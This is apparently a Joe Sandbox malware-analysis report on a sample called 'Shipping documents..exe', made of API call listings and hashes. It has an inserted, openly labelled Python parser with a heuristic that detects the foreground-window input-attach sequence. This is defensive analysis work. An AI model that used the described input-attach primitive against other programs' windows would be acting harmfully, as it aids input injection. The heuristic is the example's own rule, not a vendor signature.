                                                                                                          • API String ID: 2483343779-2107944366
                                                                                                          APIs
                                                                                                          • SendMessageW.USER32(00000000,00001036,00000010,00000010), ref: 004506A0
                                                                                                          • SendMessageW.USER32(00000000,00001036,00000000,?), ref: 004506B4
                                                                                                          • SetWindowPos.USER32(?,00000000,00000000,00000000,00000000,00000000,00000013), ref: 004506D5
                                                                                                          • _wcslen.LIBCMT ref: 00450720
                                                                                                          • _wcscat.LIBCMT ref: 00450733
                                                                                                          • SendMessageW.USER32(?,00001057,00000000,?), ref: 0045074C
                                                                                                          • SendMessageW.USER32(?,00001061,?,?), ref: 0045077E
                                                                                                          Strings
                                                                                                          Similarity
                                                                                                          • API ID: MessageSend$Window_wcscat_wcslen
                                                                                                          • String ID: -----$SysListView32
                                                                                                          • API String ID: 4008455318-3975388722
                                                                                                          APIs
                                                                                                            • Part of subcall function 00401B10: _wcslen.LIBCMT ref: 00401B11
                                                                                                            • Part of subcall function 00401B10: _memmove.LIBCMT ref: 00401B57
                                                                                                          • SendMessageW.USER32(00000000,0000018C,000000FF,00000000), ref: 00469C73
                                                                                                          • GetDlgCtrlID.USER32(00000000), ref: 00469C84
                                                                                                          • GetParent.USER32 ref: 00469C98
                                                                                                          • SendMessageW.USER32(00000000,?,00000111), ref: 00469C9F
                                                                                                          • GetDlgCtrlID.USER32(00000000), ref: 00469CA5
                                                                                                          • GetParent.USER32 ref: 00469CBC
                                                                                                          • SendMessageW.USER32(00000000,?,00000111,?), ref: 00469CC3
                                                                                                          Strings
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000000.00000002.2123215660.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                          • Associated: 00000000.00000002.2123199904.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                                          • Associated: 00000000.00000002.2123263333.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                                                                          • Associated: 00000000.00000002.2123280592.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                                                                          • Associated: 00000000.00000002.2123298977.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                                                                                                          • Associated: 00000000.00000002.2123317319.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                                                                                                          • Associated: 00000000.00000002.2123317319.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
                                                                                                          • Associated: 00000000.00000002.2123361063.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_0_2_400000_Shipping documents.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: MessageSend$CtrlParent$_memmove_wcslen
                                                                                                          • String ID: ComboBox$ListBox
                                                                                                          • API String ID: 2360848162-1403004172
                                                                                                          • Opcode ID: 7a27601cbaa80f740c595597d901cdf30e8ed390f6d586fa417b55efe09de5c4
                                                                                                          • Instruction ID: b77daa4920d68b7dc7b38413de7e2b04daab878370679d8231203fb1b5b646ea
                                                                                                          • Opcode Fuzzy Hash: 7a27601cbaa80f740c595597d901cdf30e8ed390f6d586fa417b55efe09de5c4
                                                                                                          • Instruction Fuzzy Hash: 0121E7716001187BDB00AB69CC85ABF779CEB85320F00855BFA149B2D1D6B8D845C7A5
                                                                                                          APIs
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000000.00000002.2123215660.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                          • Associated: 00000000.00000002.2123199904.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                                          • Associated: 00000000.00000002.2123263333.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                                                                          • Associated: 00000000.00000002.2123280592.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                                                                          • Associated: 00000000.00000002.2123298977.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                                                                                                          • Associated: 00000000.00000002.2123317319.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                                                                                                          • Associated: 00000000.00000002.2123317319.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
                                                                                                          • Associated: 00000000.00000002.2123361063.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_0_2_400000_Shipping documents.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: _wcscpy$FolderUninitialize$BrowseDesktopFromInitializeListMallocPath
                                                                                                          • String ID:
                                                                                                          • API String ID: 262282135-0
                                                                                                          • Opcode ID: 6572a5b0ab20a3b352b20f616e179ebe31bc85c3400954ff5f88a0c3e804af97
                                                                                                          • Instruction ID: f209a7e015878e5ef66622a864ec89938c936514b9877fb167e893f071c19078
                                                                                                          • Opcode Fuzzy Hash: 6572a5b0ab20a3b352b20f616e179ebe31bc85c3400954ff5f88a0c3e804af97
                                                                                                          • Instruction Fuzzy Hash: 25718275900208AFCB14EF95C9849DEB7B9EF88304F00899AE9099B312D735EE45CF64
                                                                                                          APIs
                                                                                                          • SendMessageW.USER32(?,0000101F,00000000,00000000), ref: 004481A8
                                                                                                          • SendMessageW.USER32(00000000,?,0000101F,00000000), ref: 004481AB
                                                                                                          • GetWindowLongW.USER32(?,000000F0), ref: 004481CF
                                                                                                          • SendMessageW.USER32(?,00001004,00000000,00000000), ref: 004481F2
                                                                                                          • SendMessageW.USER32(?,0000104D,00000000,00000007), ref: 00448266
                                                                                                          • SendMessageW.USER32(?,00001074,?,00000007), ref: 004482B4
                                                                                                          • SendMessageW.USER32(?,00001057,00000000,00000000), ref: 004482CF
                                                                                                          • SendMessageW.USER32(?,0000101D,00000001,00000000), ref: 004482F1
                                                                                                          • SendMessageW.USER32(?,0000101E,00000001,?), ref: 00448308
                                                                                                          • SendMessageW.USER32(?,00001008,?,00000007), ref: 00448320
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000000.00000002.2123215660.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                          • Associated: 00000000.00000002.2123199904.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                                          • Associated: 00000000.00000002.2123263333.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                                                                          • Associated: 00000000.00000002.2123280592.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                                                                          • Associated: 00000000.00000002.2123298977.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                                                                                                          • Associated: 00000000.00000002.2123317319.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                                                                                                          • Associated: 00000000.00000002.2123317319.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
                                                                                                          • Associated: 00000000.00000002.2123361063.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_0_2_400000_Shipping documents.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: MessageSend$LongWindow
                                                                                                          • String ID:
                                                                                                          • API String ID: 312131281-0
                                                                                                          • Opcode ID: 6a3a0ce9ab1f2311975bf00a061da1b0f9e556c56634a45a126b5d9c196b7e2c
                                                                                                          • Instruction ID: c7c5d5d6f9bf0949bb943eac7ac5a8ec30049dd2ce11923e35461b50cec8bdb0
                                                                                                          • Opcode Fuzzy Hash: 6a3a0ce9ab1f2311975bf00a061da1b0f9e556c56634a45a126b5d9c196b7e2c
                                                                                                          • Instruction Fuzzy Hash: 97617C70A00208AFEB10DF94DC81FEE77B9FF49714F10429AF914AB291DBB5AA41CB54
                                                                                                          APIs
                                                                                                            • Part of subcall function 004413AA: DeleteObject.GDI32(?), ref: 0044140B
                                                                                                          • SendMessageW.USER32(769523D0,00001001,00000000,?), ref: 00448E16
                                                                                                          • SendMessageW.USER32(769523D0,00001026,00000000,?), ref: 00448E25
                                                                                                            • Part of subcall function 00441432: CreateSolidBrush.GDI32(?), ref: 0044147E
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000000.00000002.2123215660.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                          • Associated: 00000000.00000002.2123199904.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                                          • Associated: 00000000.00000002.2123263333.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                                                                          • Associated: 00000000.00000002.2123280592.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                                                                          • Associated: 00000000.00000002.2123298977.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                                                                                                          • Associated: 00000000.00000002.2123317319.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                                                                                                          • Associated: 00000000.00000002.2123317319.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
                                                                                                          • Associated: 00000000.00000002.2123361063.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_0_2_400000_Shipping documents.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: MessageSend$BrushCreateDeleteObjectSolid
                                                                                                          • String ID:
                                                                                                          • API String ID: 3771399671-0
                                                                                                          • Opcode ID: 36703352345276820fdd923f04099b07a85a16fcace37fcd15d9f96d3dbdb764
                                                                                                          • Instruction ID: 7c26134f999fedcb31daf2d1c178305a5bad5d5d588b7e0560cc3c70a69cf84e
                                                                                                          • Opcode Fuzzy Hash: 36703352345276820fdd923f04099b07a85a16fcace37fcd15d9f96d3dbdb764
                                                                                                          • Instruction Fuzzy Hash: C7511570300214ABF720DF24DC85FAE77A9EF14724F10491EFA59AB291CB79E9498B18
                                                                                                          APIs
                                                                                                          • GetCurrentThreadId.KERNEL32 ref: 00434643
                                                                                                          • GetForegroundWindow.USER32(00000000), ref: 00434655
                                                                                                          • GetWindowThreadProcessId.USER32(00000000), ref: 0043465C
                                                                                                          • AttachThreadInput.USER32(00000000,00000000,00000001), ref: 00434671
                                                                                                          • GetWindowThreadProcessId.USER32(?,?), ref: 0043467F
                                                                                                          • AttachThreadInput.USER32(00000000,00000000,00000001), ref: 00434698
                                                                                                          • AttachThreadInput.USER32(00000000,00000000,00000001), ref: 004346A6
                                                                                                          • AttachThreadInput.USER32(00000000,00000000,00000000), ref: 004346F3
                                                                                                          • AttachThreadInput.USER32(00000000,00000000,00000000), ref: 00434707
                                                                                                          • AttachThreadInput.USER32(00000000,00000000,00000000), ref: 00434712
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000000.00000002.2123215660.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                          • Associated: 00000000.00000002.2123199904.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                                          • Associated: 00000000.00000002.2123263333.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                                                                          • Associated: 00000000.00000002.2123280592.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                                                                          • Associated: 00000000.00000002.2123298977.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                                                                                                          • Associated: 00000000.00000002.2123317319.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                                                                                                          • Associated: 00000000.00000002.2123317319.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
                                                                                                          • Associated: 00000000.00000002.2123361063.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_0_2_400000_Shipping documents.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: Thread$AttachInput$Window$Process$CurrentForeground
                                                                                                          • String ID:
                                                                                                          • API String ID: 2156557900-0
                                                                                                          • Opcode ID: 67cee910062edc5350ae4d2b9d1366d6ad4b01d413104696f98c87e4c7643c1b
                                                                                                          • Instruction ID: 33c2ceff45d8cb0672f592c0823183733d26e7ad7419b63083ab10cfbc882f35
                                                                                                          • Opcode Fuzzy Hash: 67cee910062edc5350ae4d2b9d1366d6ad4b01d413104696f98c87e4c7643c1b
                                                                                                          • Instruction Fuzzy Hash: 98313EB2600204BFDB11DF69DC859AEB7A9FB9A310F00552AF905D7250E778AD40CB6C
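                                                                                                          The call listing of the function at 00434643 above is the standard foreground-window input-attach sequence: GetForegroundWindow, GetWindowThreadProcessId, AttachThreadInput with fAttach=TRUE, then the matching AttachThreadInput with fAttach=FALSE. The Python below is an added example, not part of the Joe Sandbox report or of the analysed sample: it parses the report's "APIs" lines ("• Name.MODULE(args), ref: ADDR", optionally prefixed with "Part of subcall function ADDR:") into structured records and runs a heuristic of its own over the parsed sequence. The two embedded listings are copied from the records above (00434643 and 00469C73); the argument typing (an 8-hex-digit token is read as a DWORD, "?" as an unrecovered value) and the detect_foreground_input_attach rule are this example's assumptions, not Joe Sandbox's similarity or signature logic.

```python
import re
from collections import Counter
from dataclasses import dataclass
from typing import List, Optional, Tuple, Union

Arg = Union[int, str, None]  # 8-hex-digit word -> int, "?" -> None, inline text -> str


@dataclass(frozen=True)
class ApiCall:
    name: str                         # imported function, e.g. AttachThreadInput
    module: str                       # module tag printed by the report, e.g. USER32
    args: Tuple[Arg, ...]             # arguments as the report shows them
    ref: int                          # call-site address
    subcall_of: Optional[int] = None  # set for "Part of subcall function X:" lines


# One report line: optional bullet, optional subcall prefix, Name.MODULE,
# optional (args), then "ref: ADDR".
_LINE_RE = re.compile(
    "^\\s*\u2022?\\s*"
    r"(?:Part of subcall function (?P<sub>[0-9A-Fa-f]{8}):\s*)?"
    r"(?P<name>[A-Za-z_]\w*)\.(?P<module>[A-Za-z0-9]+)"
    r"(?:\((?P<args>[^)]*)\))?"
    r",?\s*ref:\s*(?P<ref>[0-9A-Fa-f]{8})\s*$"
)


def _parse_arg(tok: str) -> Arg:
    tok = tok.strip()
    if tok == "?":
        return None                   # value not recovered by the sandbox
    if re.fullmatch(r"[0-9A-Fa-f]{8}", tok):
        return int(tok, 16)           # assumption: 8 hex digits is a DWORD, not text
    return tok                        # inline string argument, e.g. "close all"


def parse_listing(text: str) -> List[ApiCall]:
    """Parse the call lines of one 'APIs' block. Section headers (no 'ref:')
    are skipped; a line that carries 'ref:' but does not match is an error."""
    calls: List[ApiCall] = []
    for line in text.splitlines():
        if "ref:" not in line:
            continue
        m = _LINE_RE.match(line)
        if m is None:
            raise ValueError(f"unrecognised API line: {line!r}")
        raw = m.group("args")
        args = tuple(_parse_arg(t) for t in raw.split(",")) if raw else ()
        sub = m.group("sub")
        calls.append(ApiCall(m.group("name"), m.group("module"), args,
                             int(m.group("ref"), 16), int(sub, 16) if sub else None))
    return calls


def api_histogram(calls: List[ApiCall]) -> Counter:
    return Counter(c.name for c in calls)


def attach_detach_counts(calls: List[ApiCall]) -> Tuple[int, int]:
    """Count AttachThreadInput(.., fAttach=TRUE) and (.., fAttach=FALSE) calls."""
    attach = detach = 0
    for c in calls:
        if c.name == "AttachThreadInput" and len(c.args) == 3:
            if c.args[2] == 1:
                attach += 1
            elif c.args[2] == 0:
                detach += 1
    return attach, detach


def detect_foreground_input_attach(calls: List[ApiCall]) -> bool:
    """Heuristic (this example's own rule, not a Joe Sandbox signature): the
    function resolves the foreground window, attaches the caller's input queue
    to that window's thread, and later detaches. Legitimate GUI code does this
    to satisfy SetForegroundWindow/SetFocus rules; it is also the primitive
    needed to push input into another process's window."""
    stage = 0  # 0: nothing seen, 1: foreground window resolved, 2: attached
    for c in calls:
        if c.name == "GetForegroundWindow":
            stage = max(stage, 1)
        elif c.name == "AttachThreadInput" and len(c.args) == 3:
            if stage == 1 and c.args[2] == 1:
                stage = 2
            elif stage == 2 and c.args[2] == 0:
                return True
    return False


# Listings copied from the report records above (functions 00434643 and 00469C73).
ATTACH_LISTING = """\
• GetCurrentThreadId.KERNEL32 ref: 00434643
• GetForegroundWindow.USER32(00000000), ref: 00434655
• GetWindowThreadProcessId.USER32(00000000), ref: 0043465C
• AttachThreadInput.USER32(00000000,00000000,00000001), ref: 00434671
• GetWindowThreadProcessId.USER32(?,?), ref: 0043467F
• AttachThreadInput.USER32(00000000,00000000,00000001), ref: 00434698
• AttachThreadInput.USER32(00000000,00000000,00000001), ref: 004346A6
• AttachThreadInput.USER32(00000000,00000000,00000000), ref: 004346F3
• AttachThreadInput.USER32(00000000,00000000,00000000), ref: 00434707
• AttachThreadInput.USER32(00000000,00000000,00000000), ref: 00434712
"""
COMBO_LISTING = """\
APIs
  • Part of subcall function 00401B10: _wcslen.LIBCMT ref: 00401B11
  • Part of subcall function 00401B10: _memmove.LIBCMT ref: 00401B57
• SendMessageW.USER32(00000000,0000018C,000000FF,00000000), ref: 00469C73
• GetDlgCtrlID.USER32(00000000), ref: 00469C84
• GetParent.USER32 ref: 00469C98
• SendMessageW.USER32(00000000,?,00000111), ref: 00469C9F
• GetDlgCtrlID.USER32(00000000), ref: 00469CA5
• GetParent.USER32 ref: 00469CBC
• SendMessageW.USER32(00000000,?,00000111,?), ref: 00469CC3
"""

if __name__ == "__main__":
    for label, text in (("00434643", ATTACH_LISTING), ("00469C73", COMBO_LISTING)):
        calls = parse_listing(text)
        print(label, dict(api_histogram(calls)), attach_detach_counts(calls),
              "foreground-attach" if detect_foreground_input_attach(calls) else "-")
```

                                                                                                          The rule deliberately requires the detach call after the attach: a function that only attaches is more likely to be an unfinished or error path, and a balanced attach/detach pair is what the listing at 00434643 shows (three of each). The same parser can be pointed at any other "APIs" block in this report to build per-function call histograms for clustering.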
                                                                                                          Strings
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000000.00000002.2123215660.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                          • Associated: 00000000.00000002.2123199904.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                                          • Associated: 00000000.00000002.2123263333.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                                                                          • Associated: 00000000.00000002.2123280592.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                                                                          • Associated: 00000000.00000002.2123298977.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                                                                                                          • Associated: 00000000.00000002.2123317319.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                                                                                                          • Associated: 00000000.00000002.2123317319.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
                                                                                                          • Associated: 00000000.00000002.2123361063.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_0_2_400000_Shipping documents.jbxd
                                                                                                          Similarity
                                                                                                          • API ID:
                                                                                                          • String ID: CLASS$CLASSNN$INSTANCE$NAME$REGEXPCLASS$TEXT
                                                                                                          • API String ID: 0-1603158881
                                                                                                          • Opcode ID: b2205c720eb57eaa9acd20c5cdad8c47631596d61f09c649adc7dd6ac6f1094b
                                                                                                          • Instruction ID: 400245e8055df5988f0e80dfbae95eacb55e3b8a933f722a5dc1e2c8929bf265
                                                                                                          • Opcode Fuzzy Hash: b2205c720eb57eaa9acd20c5cdad8c47631596d61f09c649adc7dd6ac6f1094b
                                                                                                          • Instruction Fuzzy Hash: FAA162B5800204ABDF00EF61D8C1BEA3368AF54349F58857BEC096B146EB7D6909D77A
                                                                                                          APIs
                                                                                                          • mciSendStringW.WINMM(close all,00000000,00000000,00000000), ref: 00401D06
                                                                                                          • DestroyWindow.USER32(?), ref: 00426F50
                                                                                                          • UnregisterHotKey.USER32(?), ref: 00426F77
                                                                                                          • FreeLibrary.KERNEL32(?), ref: 0042701F
                                                                                                          • VirtualFree.KERNEL32(?,00000000,00008000), ref: 00427050
                                                                                                          Strings
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000000.00000002.2123215660.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                          • Associated: 00000000.00000002.2123199904.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                                          • Associated: 00000000.00000002.2123263333.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                                                                          • Associated: 00000000.00000002.2123280592.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                                                                          • Associated: 00000000.00000002.2123298977.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                                                                                                          • Associated: 00000000.00000002.2123317319.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                                                                                                          • Associated: 00000000.00000002.2123317319.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
                                                                                                          • Associated: 00000000.00000002.2123361063.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_0_2_400000_Shipping documents.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: Free$DestroyLibrarySendStringUnregisterVirtualWindow
                                                                                                          • String ID: close all$#v
                                                                                                          • API String ID: 4174999648-3101823635
                                                                                                          • Opcode ID: 2f66c89a40f0e85c5d6dd4ec67defb2116834faec8b505cc193eeea2d12e665d
                                                                                                          • Instruction ID: 89fc9d45334329c88beddca7a6314a06ce6e15860ee53b488cbf8147960762b2
                                                                                                          • Opcode Fuzzy Hash: 2f66c89a40f0e85c5d6dd4ec67defb2116834faec8b505cc193eeea2d12e665d
                                                                                                          • Instruction Fuzzy Hash: 9BA1C174710212CFC710EF15C985B5AF3A8BF48304F5045AEE909672A2CB78BD96CF99
                                                                                                          APIs
                                                                                                          • CreateMenu.USER32 ref: 00448603
                                                                                                          • SetMenu.USER32(?,00000000), ref: 00448613
                                                                                                          • GetMenuItemInfoW.USER32(?,?,00000000,00000030), ref: 00448697
                                                                                                          • IsMenu.USER32(?), ref: 004486AB
                                                                                                          • CreatePopupMenu.USER32 ref: 004486B5
                                                                                                          • InsertMenuItemW.USER32(?,?,00000001,00000030), ref: 004486EC
                                                                                                          • DrawMenuBar.USER32 ref: 004486F5
                                                                                                          Strings
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000000.00000002.2123215660.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                          • Associated: 00000000.00000002.2123199904.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                                          • Associated: 00000000.00000002.2123263333.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                                                                          • Associated: 00000000.00000002.2123280592.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                                                                          • Associated: 00000000.00000002.2123298977.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                                                                                                          • Associated: 00000000.00000002.2123317319.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                                                                                                          • Associated: 00000000.00000002.2123317319.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
                                                                                                          • Associated: 00000000.00000002.2123361063.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_0_2_400000_Shipping documents.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: Menu$CreateItem$DrawInfoInsertPopup
                                                                                                          • String ID: 0
                                                                                                          • API String ID: 161812096-4108050209
                                                                                                          • Opcode ID: 5f9c542d8f07ae56d95057f828c3334b95156dd137b7db0efda9360fb5a3d221
                                                                                                          • Instruction ID: 1651b4fd0bf3e4e6d8e032b2651979207be8780685d2f09cc615cc8e1c1775d8
                                                                                                          • Opcode Fuzzy Hash: 5f9c542d8f07ae56d95057f828c3334b95156dd137b7db0efda9360fb5a3d221
                                                                                                          • Instruction Fuzzy Hash: 9D418B75A01209AFEB40DF98D884ADEB7B4FF49314F10815EED189B340DB74A851CFA8
                                                                                                          APIs
                                                                                                          • GetModuleHandleW.KERNEL32(00000000,004A90E8,?,00000100,?,C:\Users\user\Desktop\Shipping documents..exe), ref: 00434057
                                                                                                          • LoadStringW.USER32(00000000), ref: 00434060
                                                                                                          • GetModuleHandleW.KERNEL32(00000000,00001389,?,00000100), ref: 00434075
                                                                                                          • LoadStringW.USER32(00000000), ref: 00434078
                                                                                                          • _wprintf.LIBCMT ref: 004340A1
                                                                                                          • MessageBoxW.USER32(00000000,?,?,00011010), ref: 004340B9
                                                                                                          Strings
                                                                                                          • C:\Users\user\Desktop\Shipping documents..exe, xrefs: 00434040
                                                                                                          • %s (%d) : ==> %s: %s %s, xrefs: 0043409C
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000000.00000002.2123215660.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                          • Associated: 00000000.00000002.2123199904.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                                          • Associated: 00000000.00000002.2123263333.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                                                                          • Associated: 00000000.00000002.2123280592.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                                                                          • Associated: 00000000.00000002.2123298977.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                                                                                                          • Associated: 00000000.00000002.2123317319.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                                                                                                          • Associated: 00000000.00000002.2123317319.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
                                                                                                          • Associated: 00000000.00000002.2123361063.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_0_2_400000_Shipping documents.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: HandleLoadModuleString$Message_wprintf
                                                                                                          • String ID: %s (%d) : ==> %s: %s %s$C:\Users\user\Desktop\Shipping documents..exe
                                                                                                          • API String ID: 3648134473-869968937
                                                                                                          • Opcode ID: 5806584fae846cee426602f55e287a2c1afdddb79e6f9c87a69d5249cd46d2cb
                                                                                                          • Instruction ID: 3f99f1473d628bc1a501e0113e735bb0cc043e2cca9b2706ac47da9b95460e2a
                                                                                                          • Opcode Fuzzy Hash: 5806584fae846cee426602f55e287a2c1afdddb79e6f9c87a69d5249cd46d2cb
                                                                                                          • Instruction Fuzzy Hash: EB016CB26903187EE710E754DD06FFA376CEBC4B11F00459AB708A61C49AF469848BB5
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000000.00000002.2123215660.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                          • Associated: 00000000.00000002.2123199904.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                                          • Associated: 00000000.00000002.2123263333.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                                                                          • Associated: 00000000.00000002.2123280592.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                                                                          • Associated: 00000000.00000002.2123298977.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                                                                                                          • Associated: 00000000.00000002.2123317319.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                                                                                                          • Associated: 00000000.00000002.2123317319.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
                                                                                                          • Associated: 00000000.00000002.2123361063.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_0_2_400000_Shipping documents.jbxd
                                                                                                          Similarity
                                                                                                          • API ID:
                                                                                                          • String ID:
                                                                                                          • API String ID:
                                                                                                          • Opcode ID: 0b34b3a5b5d670eb49a5e2d7b5cd424f37d7569b2aa50e3450060746f4beba41
                                                                                                          • Instruction ID: 0df76164974c5272bb459d6cb57aadea20bc0786d7edd9cc69ce034119999088
                                                                                                          • Opcode Fuzzy Hash: 0b34b3a5b5d670eb49a5e2d7b5cd424f37d7569b2aa50e3450060746f4beba41
                                                                                                          • Instruction Fuzzy Hash: 10A1CE726083009FD310EF65D886B5BB3E9EBC4718F108E2EF559E7281D679E804CB96
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000000.00000002.2123215660.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                          • Associated: 00000000.00000002.2123199904.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                                          • Associated: 00000000.00000002.2123263333.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                                                                          • Associated: 00000000.00000002.2123280592.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                                                                          • Associated: 00000000.00000002.2123298977.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                                                                                                          • Associated: 00000000.00000002.2123317319.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                                                                                                          • Associated: 00000000.00000002.2123317319.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
                                                                                                          • Associated: 00000000.00000002.2123361063.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_0_2_400000_Shipping documents.jbxd
                                                                                                          Similarity
                                                                                                          • API ID:
                                                                                                          • String ID:
                                                                                                          • API String ID:
                                                                                                          • Opcode ID: b2351d13dc7e01734d52893050a6426585663f8e33c7fb02d488baa67b0c7faf
                                                                                                          • Instruction ID: d12da5a9263b129e99c802cec43d72d92cc496201e336192e500ad81068e5f87
                                                                                                          • Opcode Fuzzy Hash: b2351d13dc7e01734d52893050a6426585663f8e33c7fb02d488baa67b0c7faf
                                                                                                          • Instruction Fuzzy Hash: D7519C70600305ABEB20DF69CC81F9B77A8AB08715F50462AFE05DB3C1E7B5E8588B58
                                                                                                          APIs
                                                                                                            • Part of subcall function 00410120: GetFullPathNameW.KERNEL32(00000000,00000104,C:\Users\user\Desktop\Shipping documents..exe,0040F545,C:\Users\user\Desktop\Shipping documents..exe,004A90E8,C:\Users\user\Desktop\Shipping documents..exe,?,0040F545), ref: 0041013C
                                                                                                            • Part of subcall function 00433998: GetFileAttributesW.KERNEL32(?), ref: 0043399F
